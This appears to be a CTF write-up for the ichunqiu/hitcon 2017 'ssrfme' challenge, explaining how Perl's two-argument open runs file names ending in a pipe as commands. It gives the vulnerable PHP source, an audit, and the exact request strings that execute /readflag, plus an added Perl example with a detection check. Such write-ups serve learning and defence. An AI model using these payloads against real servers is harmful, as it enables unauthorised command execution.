
ichunqiu CTF ssrfme (GET command vulnerability in Perl's open function): detailed solution and principle learning process

2022-01-26 21:54:41 AAAAAAAAAAAA66

A few days ago I got tired of working through a command-execution problem, and now, while grinding more questions, I ran into another one. I read a lot of write-ups and none of them differ much, but the environment of this problem is a little different from that of other platforms, and some write-ups cannot even be reproduced. In the end, by thinking it through alone, I found many fine improvements. So here is a summary that sorts out all the knowledge learned, to save people from stepping into unnecessary pits and wasting time.

Catalog

subject

Perl open function GET command vulnerability

analysis

Key point

Solution

Detailed process

Thinking about this problem


Problem

Perl open function GET command vulnerability

Here I refer to a blogger's analysis; of the write-ups I checked, it is the most detailed. The problem he solved is different from the one on our platform, but it still has reference value.

About BMZCTF hitcon_2017_ssrfme Solution method _ Always a teenager -CSDN Blog

About this vulnerability, a foreign article explains it like this:
Perl saw that your "file" ended with a "pipe" (vertical bar) character. So it interpreted the "file" as a command to be executed, and interpreted the command's output as the "file"'s contents. The command is "who" (which prints information on currently logged-in users). If you execute that command, you will see that the output is exactly what the Perl program gave you.
In other words:
When Perl opens a file whose name ends with a pipe character (the vertical bar | on the keyboard), it abandons the normal file-open operation, executes the file name as a command, and uses the command's output as the file's contents. The command here is who, which prints the currently logged-in users; if you run that command yourself, you will see that its output matches what the Perl program returned.

So we can put a command that reads the flag file into the url parameter; after it executes, the flag contents are written into the file we uploaded, and when we open that file we can see the flag.
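As an added example (not from the original post or the challenge code), the following Perl script shows the mechanism described above: two-argument open treats a name ending in | as a command pipe, while three-argument open with an explicit mode does not; the file name, the harmless echo command and the pre-check function are constructed for illustration.

```perl
#!/usr/bin/perl
# Added example: Perl two-argument open vs. three-argument open on a
# "file name" that ends in a pipe character. All names are constructed.
use strict;
use warnings;

# Constructed "file name": a harmless command followed by a trailing pipe.
my $name = 'echo this-came-from-a-command |';

# Two-argument open: the mode is parsed out of the name itself, so the
# trailing "|" makes Perl run the string as a command and return its
# standard output as the "file" contents.
sub read_two_arg {
    my ($fname) = @_;
    open(my $fh, $fname) or return "open failed: $!";
    local $/;                       # slurp the whole stream
    my $content = <$fh>;
    close($fh);
    return $content;
}

# Three-argument open: the mode is fixed to "<" (read), so the name is
# only ever a path and a trailing "|" is just another character in it.
sub read_three_arg {
    my ($fname) = @_;
    open(my $fh, '<', $fname) or return "open failed: $!";
    local $/;
    my $content = <$fh>;
    close($fh);
    return $content;
}

# Defensive pre-check (constructed helper) for caller-supplied names that
# must still reach legacy two-argument open: flag a leading "|", "<", ">"
# or "+" and a trailing "|", which two-argument open reads as a mode.
sub looks_like_open_mode {
    my ($fname) = @_;
    return $fname =~ /^\s*[|<>+]|\|\s*$/ ? 1 : 0;
}

print "two-arg  : ", read_two_arg($name);          # output of the echo command
print "three-arg: ", read_three_arg($name), "\n";   # open failed: No such file or directory
print "flagged  : ", looks_like_open_mode($name), "\n";  # 1
```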

Analysis

<?php 
    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); 
    @mkdir($sandbox); 
    @chdir($sandbox); 

    $data = shell_exec("GET " . escapeshellarg($_GET["url"])); 
    $info = pathinfo($_GET["filename"]); 
    $dir  = str_replace(".", "", basename($info["dirname"])); 
    @mkdir($dir); 
    @chdir($dir); 
    @file_put_contents(basename($info["basename"]), $data); 
    highlight_file(__FILE__); 

A brief audit of the code

$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($sandbox);
@chdir($sandbox);

Take the user's IP and use the MD5 of "orange" concatenated with the IP as the folder name (the IP here is your own IP).

Key point

$data = shell_exec("GET " . escapeshellarg($_GET["url"]));

Take the url value from the request, transcode it with escapeshellarg, and then run it through shell_exec (command execution): GET receives the transcoded url parameter value, the output of the command is stored in $data, and in the code below $data (that is, the result of this command execution) is written into the folder we pass in.

In fact, a reverse shell approach could also be used here.

escapeshellarg:
(PHP 4 >= 4.0.3, PHP 5, PHP 7)
Escape a string to be used as a shell argument
string escapeshellarg ( string $arg )
escapeshellarg() adds single quotes around a string and quotes/escapes any existing single quotes, which ensures that the string can be passed directly into a shell function and be treated as a single, safe argument. This function should be used for parameters that come from user input. The shell functions include exec(), system() and the backtick execution operator.
Summary:
1. It ensures that the user passes only one argument to the command.
2. The user cannot specify additional arguments.
3. The user cannot execute a different command.

$info = pathinfo($_GET["filename"]);
$dir  = str_replace(".", "", basename($info["dirname"]));
@mkdir($dir);
@chdir($dir);

Next, take filename from the GET request and filter out . with str_replace, so that ../ cannot be used to change where the file is written. If filename is a path, the current directory is changed to that path.

@file_put_contents(basename($info["basename"]), $data);
Finally, write the content of $data (the result of executing the url value) into filename.

Solution

Ideas
1. First use ?url=/&filename=qqq. Here / is given as the url value; / in Linux denotes the root directory, so executing GET / fetches a listing of the server's root directory.
2. Then visit /sandbox/md5/qqq to see that directory listing. Here you can see the flag and readflag files; the flag is inside readflag, so we have to execute readflag to obtain the flag. Construct the following statements:
3. ?url=&filename=bash -c /readflag| creates a file in the sandbox whose name is the command-execution statement; its content is empty (anything works, it has no effect).
4. ?url=file:bash -c /readflag|&filename=321 executes it as a command, and the value obtained by running readflag is stored in the file 321.
5. Visit /sandbox/md5/321 to get the flag.

Detailed process

Obtain the MD5 value

Search "ip" on Baidu to get your own IP value; faster than ipconfig, haha.

Then search Baidu for "MD5 encryption".

Obtain the MD5 value.

Look at the root directory

?url=/&filename=qqq
/sandbox/md5/qqq

?url=&filename=bash -c /readflag|
?url=file:bash -c /readflag|&filename=321 

There is a stray question mark here; ignore it (no effect).

Obtain the flag

flag{d9faf0e7-6152-48be-8c5c-479c9681bcf3}

Thinking about this problem

1. First of all, the url in this problem can obviously take parameters, so why not execute the command directly through url to view the flag? Why use the command execution in GET's open function? I have also seen such a solution in some write-ups (I tried it in the end; at most you get a garbled file). It is all the same question, [hitcon 2017]ssrfme, with the command passed directly to url to get the flag. In addition, if the vulnerability in the GET function must be used every time, then how did the first step, which did not use the | pipe, succeed in executing the command? My suspicion here is that the ichunqiu site has some prevention or filtering for command execution?

2. Since commands can be executed, a reverse shell method could also be used to obtain the flag, referring to a problem I wrote up recently, but it may also be that the ichunqiu site filters some commands, so it did not work. (Maybe I am just a noob, haha.) Here is the process I wrote; corrections from experts are welcome.

ichunqiu Death ping command: principle learning (command execution + reverse shell) + reproduction - AAAAAAAAAAAA66's blog - CSDN Blog


Copyright notice
Author [AAAAAAAAAAAA66]; please include the original link when reprinting, thank you.
https://en.cdmana.com/2022/01/202201262154373824.html
